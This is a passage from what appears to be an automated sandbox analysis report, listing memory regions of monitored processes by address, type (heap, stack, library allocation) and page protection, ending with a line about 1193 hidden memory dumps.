heap
|
page read and write
|
||
2B023984000
|
trusted library allocation
|
page read and write
|
||
20145876000
|
trusted library allocation
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849213000
|
trusted library allocation
|
page read and write
|
||
1C307715000
|
heap
|
page read and write
|
||
CE11EF6000
|
stack
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
2B03B0D2000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
1784E110000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1C3219C7000
|
heap
|
page execute and read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
1C307950000
|
trusted library allocation
|
page read and write
|
||
17868346000
|
heap
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
205B7476000
|
heap
|
page read and write
|
||
1D9729B0000
|
heap
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
1C321AFA000
|
heap
|
page read and write
|
||
1D972A80000
|
heap
|
page readonly
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
7DF42E390000
|
trusted library allocation
|
page execute and read and write
|
||
1D901042000
|
trusted library allocation
|
page read and write
|
||
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
1C321B89000
|
heap
|
page read and write
|
||
1D97461C000
|
heap
|
page read and write
|
||
205B5BC0000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
2B032981000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
1D901A60000
|
trusted library allocation
|
page read and write
|
||
20145A23000
|
trusted library allocation
|
page read and write
|
||
1D910011000
|
trusted library allocation
|
page read and write
|
||
2B020EE0000
|
heap
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
E0669FF000
|
stack
|
page read and write
|
||
2B03B3E8000
|
heap
|
page read and write
|
||
1C30AA31000
|
trusted library allocation
|
page read and write
|
||
1D974C30000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1C31940F000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1C3079C5000
|
heap
|
page read and write
|
||
2B03AF10000
|
trusted library allocation
|
page read and write
|
||
2B03B3D0000
|
heap
|
page read and write
|
||
17868090000
|
heap
|
page execute and read and write
|
||
178680B4000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7DF4D0650000
|
trusted library allocation
|
page execute and read and write
|
||
2B02434B000
|
trusted library allocation
|
page read and write
|
||
20145A4E000
|
trusted library allocation
|
page read and write
|
||
6C72178000
|
stack
|
page read and write
|
||
20143D70000
|
trusted library allocation
|
page read and write
|
||
2069CF00000
|
heap
|
page read and write
|
||
2014567F000
|
trusted library allocation
|
page read and write
|
||
1D974C00000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
1D974D39000
|
heap
|
page read and write
|
||
2015C62F000
|
heap
|
page read and write
|
||
7FF8492A2000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
20142200000
|
heap
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
2015C760000
|
heap
|
page read and write
|
||
1784FFD9000
|
trusted library allocation
|
page read and write
|
||
1785FEC1000
|
trusted library allocation
|
page read and write
|
||
1D9019ED000
|
trusted library allocation
|
page read and write
|
||
E0662FD000
|
unkown
|
page read and write
|
||
205B7450000
|
heap
|
page read and write
|
||
1C30AAEC000
|
trusted library allocation
|
page read and write
|
||
1D974D22000
|
heap
|
page read and write
|
||
205B7891000
|
trusted library allocation
|
page read and write
|
||
6C71DFE000
|
stack
|
page read and write
|
||
20145118000
|
trusted library allocation
|
page read and write
|
||
205CFAD1000
|
heap
|
page read and write
|
||
2B03B112000
|
heap
|
page read and write
|
||
7FF8492A0000
|
trusted library allocation
|
page read and write
|
||
2B03ADD0000
|
heap
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
1C30A446000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
2B03AE4A000
|
heap
|
page read and write
|
||
1C321BEA000
|
heap
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
6C723FB000
|
stack
|
page read and write
|
||
205CFBD0000
|
heap
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
1C309DC1000
|
trusted library allocation
|
page read and write
|
||
1D900001000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
1C30AD82000
|
trusted library allocation
|
page read and write
|
||
2B020C66000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
72CA8FF000
|
stack
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
2B03B0BD000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1D974BD0000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
2B02375F000
|
trusted library allocation
|
page read and write
|
||
1D972A10000
|
heap
|
page read and write
|
||
1D972AF8000
|
heap
|
page read and write
|
||
7FF848F91000
|
trusted library allocation
|
page read and write
|
||
1D9745D0000
|
heap
|
page read and write
|
||
19D95F8000
|
stack
|
page read and write
|
||
197B6FE000
|
stack
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
17868390000
|
heap
|
page read and write
|
||
1D9016E5000
|
trusted library allocation
|
page read and write
|
||
197B67E000
|
stack
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
1784DFFC000
|
heap
|
page read and write
|
||
197B3ED000
|
stack
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
2015C988000
|
heap
|
page read and write
|
||
20143C00000
|
heap
|
page read and write
|
||
20153FD4000
|
trusted library allocation
|
page read and write
|
||
6C71CFE000
|
stack
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
E0665FD000
|
stack
|
page read and write
|
||
1C30AABA000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
2B03AE4E000
|
heap
|
page read and write
|
||
17850187000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
20143C70000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
1D975141000
|
heap
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
6C7237E000
|
stack
|
page read and write
|
||
1C30ADA2000
|
trusted library allocation
|
page read and write
|
||
E0663FE000
|
stack
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
1D901840000
|
trusted library allocation
|
page read and write
|
||
1D975120000
|
heap
|
page read and write
|
||
1784DFC1000
|
heap
|
page read and write
|
||
20143DE5000
|
heap
|
page read and write
|
||
205B7B75000
|
trusted library allocation
|
page read and write
|
||
2B032971000
|
trusted library allocation
|
page read and write
|
||
1C321E99000
|
heap
|
page read and write
|
||
1784DFB5000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
17868300000
|
heap
|
page read and write
|
||
1784E150000
|
heap
|
page readonly
|
||
17868327000
|
heap
|
page read and write
|
||
E06637E000
|
stack
|
page read and write
|
||
2B020E60000
|
heap
|
page read and write
|
||
1C319449000
|
trusted library allocation
|
page read and write
|
||
20145053000
|
trusted library allocation
|
page read and write
|
||
CE12E0A000
|
stack
|
page read and write
|
||
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
6C722FF000
|
stack
|
page read and write
|
||
2014556F000
|
trusted library allocation
|
page read and write
|
||
1D974D25000
|
heap
|
page read and write
|
||
205B87D2000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
1C3093A1000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
205B59C6000
|
heap
|
page read and write
|
||
2B032C47000
|
trusted library allocation
|
page read and write
|
||
1C30955A000
|
trusted library allocation
|
page read and write
|
||
1C321E80000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1784DFB3000
|
heap
|
page read and write
|
||
1D9001BA000
|
trusted library allocation
|
page read and write
|
||
201423C0000
|
heap
|
page read and write
|
||
1C3079CB000
|
heap
|
page read and write
|
||
2069D140000
|
heap
|
page read and write
|
||
1C321C6F000
|
heap
|
page read and write
|
||
1D974C2C000
|
heap
|
page read and write
|
||
2B02373D000
|
trusted library allocation
|
page read and write
|
||
20142400000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
1D9016C5000
|
trusted library allocation
|
page read and write
|
||
1C307940000
|
trusted library section
|
page read and write
|
||
20145914000
|
trusted library allocation
|
page read and write
|
||
1C30A5B7000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
197B8FD000
|
stack
|
page read and write
|
||
2B023812000
|
trusted library allocation
|
page read and write
|
||
2069CFE3000
|
heap
|
page read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
2B0237E0000
|
trusted library allocation
|
page read and write
|
||
CE11D7E000
|
stack
|
page read and write
|
||
197BD3B000
|
stack
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
2015C4B0000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
197BC3E000
|
stack
|
page read and write
|
||
CE12038000
|
stack
|
page read and write
|
||
1C321970000
|
heap
|
page execute and read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
72CAC7E000
|
stack
|
page read and write
|
||
1D974C24000
|
heap
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
2B023B56000
|
trusted library allocation
|
page read and write
|
||
1C321EC8000
|
heap
|
page read and write
|
||
20142380000
|
heap
|
page read and write
|
||
72CABFE000
|
stack
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
20153FC5000
|
trusted library allocation
|
page read and write
|
||
2B020ED0000
|
heap
|
page readonly
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1D9745A0000
|
heap
|
page execute and read and write
|
||
6C7227E000
|
stack
|
page read and write
|
||
2B020CF0000
|
heap
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
7FF849153000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
2B0226D0000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1784FF1D000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
2B0237B1000
|
trusted library allocation
|
page read and write
|
||
205B944F000
|
trusted library allocation
|
page read and write
|
||
1C321881000
|
heap
|
page read and write
|
||
7FF8492A7000
|
trusted library allocation
|
page read and write
|
||
201421F5000
|
heap
|
page read and write
|
||
2015C647000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1D90111B000
|
trusted library allocation
|
page read and write
|
||
E066778000
|
stack
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
72CA9F9000
|
stack
|
page read and write
|
||
1784DE90000
|
heap
|
page read and write
|
||
1C30A210000
|
trusted library allocation
|
page read and write
|
||
2B03B0FE000
|
heap
|
page read and write
|
||
2B03AF20000
|
heap
|
page execute and read and write
|
||
1784F914000
|
heap
|
page read and write
|
||
1D974ADB000
|
heap
|
page read and write
|
||
1784E0D0000
|
heap
|
page read and write
|
||
1784E000000
|
heap
|
page read and write
|
||
7FF84921C000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
2B03AEF0000
|
heap
|
page execute and read and write
|
||
E06697C000
|
stack
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
197B363000
|
stack
|
page read and write
|
||
205CFAC1000
|
heap
|
page read and write
|
||
20142202000
|
heap
|
page read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
2B020E00000
|
heap
|
page read and write
|
||
2B023A4D000
|
trusted library allocation
|
page read and write
|
||
2069D144000
|
heap
|
page read and write
|
||
1D974AD7000
|
heap
|
page read and write
|
||
197BB3B000
|
stack
|
page read and write
|
||
1C30A056000
|
trusted library allocation
|
page read and write
|
||
205B5984000
|
heap
|
page read and write
|
||
1D9751F1000
|
heap
|
page read and write
|
||
17868141000
|
heap
|
page read and write
|
||
2B03AF30000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
2069CFE5000
|
heap
|
page read and write
|
||
1C307970000
|
trusted library allocation
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1D901A9B000
|
trusted library allocation
|
page read and write
|
||
1C307776000
|
heap
|
page read and write
|
||
1784E070000
|
heap
|
page read and write
|
||
205B7DD2000
|
trusted library allocation
|
page read and write
|
||
1D975122000
|
heap
|
page read and write
|
||
205B59B2000
|
heap
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1D972ABC000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
1784F936000
|
heap
|
page read and write
|
||
1D910178000
|
trusted library allocation
|
page read and write
|
||
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
19D94F9000
|
stack
|
page read and write
|
||
2B023776000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
20144DA6000
|
trusted library allocation
|
page read and write
|
||
205B7C71000
|
trusted library allocation
|
page read and write
|
||
CE12D0C000
|
stack
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
1784E160000
|
heap
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1C319420000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
2069D100000
|
heap
|
page read and write
|
||
1C319422000
|
trusted library allocation
|
page read and write
|
||
1D972CC5000
|
heap
|
page read and write
|
||
2B020EE7000
|
heap
|
page read and write
|
||
1D974D9A000
|
heap
|
page read and write
|
||
2B022951000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1C30A645000
|
trusted library allocation
|
page read and write
|
||
1C319428000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
1C307762000
|
heap
|
page read and write
|
||
1D972BE9000
|
heap
|
page read and write
|
||
2015C6AC000
|
heap
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
2015C974000
|
heap
|
page read and write
|
||
205CFC00000
|
heap
|
page read and write
|
||
1D910081000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
2B03B4C4000
|
heap
|
page read and write
|
||
2014564C000
|
trusted library allocation
|
page read and write
|
||
1C309FD2000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
2B022700000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
1C321A80000
|
heap
|
page read and write
|
||
CE1223E000
|
stack
|
page read and write
|
||
1C3219D0000
|
trusted library allocation
|
page read and write
|
||
1D901101000
|
trusted library allocation
|
page read and write
|
||
1785FF3B000
|
trusted library allocation
|
page read and write
|
||
1784DF70000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
201455F6000
|
trusted library allocation
|
page read and write
|
||
CE11FB9000
|
stack
|
page read and write
|
||
7FF849174000
|
trusted library allocation
|
page read and write
|
||
201453AF000
|
trusted library allocation
|
page read and write
|
||
205B5B50000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
17868096000
|
heap
|
page execute and read and write
|
||
205B5CA0000
|
heap
|
page read and write
|
||
17850368000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
2015C4DB000
|
heap
|
page read and write
|
||
1D9019D3000
|
trusted library allocation
|
page read and write
|
||
E06744E000
|
stack
|
page read and write
|
||
2B03B058000
|
heap
|
page read and write
|
||
1D910087000
|
trusted library allocation
|
page read and write
|
||
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
20145852000
|
trusted library allocation
|
page read and write
|
||
205CFCD8000
|
heap
|
page read and write
|
||
1784FF44000
|
trusted library allocation
|
page read and write
|
||
1C30A928000
|
trusted library allocation
|
page read and write
|
||
1C321B4F000
|
heap
|
page read and write
|
||
205B5BD0000
|
heap
|
page readonly
|
||
1D974C38000
|
heap
|
page read and write
|
||
CE11DFA000
|
stack
|
page read and write
|
||
1C3076D0000
|
heap
|
page read and write
|
||
2B03B64C000
|
heap
|
page read and write
|
||
2B03B0C4000
|
heap
|
page read and write
|
||
1785073E000
|
trusted library allocation
|
page read and write
|
||
72CA77E000
|
stack
|
page read and write
|
||
2015C555000
|
heap
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
205B5BB0000
|
trusted library allocation
|
page read and write
|
||
2B022940000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
E066273000
|
stack
|
page read and write
|
||
20153F31000
|
trusted library allocation
|
page read and write
|
||
1C30AAB1000
|
trusted library allocation
|
page read and write
|
||
205C7900000
|
trusted library allocation
|
page read and write
|
||
201421FE000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
2B024436000
|
trusted library allocation
|
page read and write
|
||
1C309180000
|
heap
|
page read and write
|
||
1784FFED000
|
trusted library allocation
|
page read and write
|
||
2015C38C000
|
heap
|
page read and write
|
||
205C791C000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
19D9679000
|
stack
|
page read and write
|
||
1D90190A000
|
trusted library allocation
|
page read and write
|
||
1C30AC0B000
|
trusted library allocation
|
page read and write
|
||
2B03B065000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
1D975183000
|
heap
|
page read and write
|
||
1D901182000
|
trusted library allocation
|
page read and write
|
||
1C307930000
|
trusted library section
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
1D974580000
|
heap
|
page execute and read and write
|
||
2B03B090000
|
heap
|
page read and write
|
||
20142218000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
2B032C3D000
|
trusted library allocation
|
page read and write
|
||
CE1213E000
|
stack
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
205B7D08000
|
trusted library allocation
|
page read and write
|
||
197C70F000
|
stack
|
page read and write
|
||
7DF4E4E80000
|
trusted library allocation
|
page execute and read and write
|
||
1C3213A9000
|
heap
|
page read and write
|
||
1C30771C000
|
heap
|
page read and write
|
||
CE121BE000
|
stack
|
page read and write
|
||
1D974600000
|
heap
|
page read and write
|
||
2B0243AA000
|
trusted library allocation
|
page read and write
|
||
20145A60000
|
trusted library allocation
|
page read and write
|
||
205CFC42000
|
heap
|
page read and write
|
||
1D974DC3000
|
heap
|
page read and write
|
||
17850738000
|
trusted library allocation
|
page read and write
|
||
205B5BC5000
|
heap
|
page read and write
|
||
1D974A60000
|
heap
|
page read and write
|
||
2015C67D000
|
heap
|
page read and write
|
||
205B5BE0000
|
trusted library allocation
|
page read and write
|
||
2B03AF9A000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
1C321B9B000
|
heap
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
205B7914000
|
trusted library allocation
|
page read and write
|
||
20143F31000
|
trusted library allocation
|
page read and write
|
||
2015C40B000
|
heap
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF8492B0000
|
trusted library allocation
|
page read and write
|
||
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD7000
|
trusted library allocation
|
page read and write
|
||
2015C68E000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
1D974DB9000
|
heap
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
2B023886000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
2B03AF4D000
|
heap
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
E066A7C000
|
stack
|
page read and write
|
||
1D974ADD000
|
heap
|
page read and write
|
||
CE11CFA000
|
stack
|
page read and write
|
||
20153FB4000
|
trusted library allocation
|
page read and write
|
||
19D8EA3000
|
stack
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
CE11F3E000
|
stack
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
CE1197E000
|
unkown
|
page read and write
|
||
2B03B447000
|
heap
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
1D972A70000
|
trusted library allocation
|
page read and write
|
||
1785FF4B000
|
trusted library allocation
|
page read and write
|
||
1D90180C000
|
trusted library allocation
|
page read and write
|
||
197B978000
|
stack
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
2B03ADE8000
|
heap
|
page read and write
|
||
2B03ADD9000
|
heap
|
page read and write
|
||
7DF42E380000
|
trusted library allocation
|
page execute and read and write
|
||
205B959A000
|
trusted library allocation
|
page read and write
|
||
20145787000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
6C72E4C000
|
stack
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
6C72F4A000
|
stack
|
page read and write
|
||
19D93FF000
|
stack
|
page read and write
|
||
2B022796000
|
heap
|
page read and write
|
||
205B7C73000
|
trusted library allocation
|
page read and write
|
||
7FF8492A0000
|
trusted library allocation
|
page read and write
|
||
2B03B6F6000
|
heap
|
page read and write
|
||
1C321B19000
|
heap
|
page read and write
|
||
205B5B90000
|
trusted library allocation
|
page read and write
|
||
E06754A000
|
stack
|
page read and write
|
||
1C321C3A000
|
heap
|
page read and write
|
||
7DF4097F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
19D8FEE000
|
stack
|
page read and write
|
||
2B03B0CF000
|
heap
|
page read and write
|
||
2B020EA0000
|
trusted library allocation
|
page read and write
|
||
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
1C321C75000
|
heap
|
page read and write
|
||
1D910089000
|
trusted library allocation
|
page read and write
|
||
1D90167C000
|
trusted library allocation
|
page read and write
|
||
1C30ACBF000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
There are 1193 hidden memdumps, click here to show them.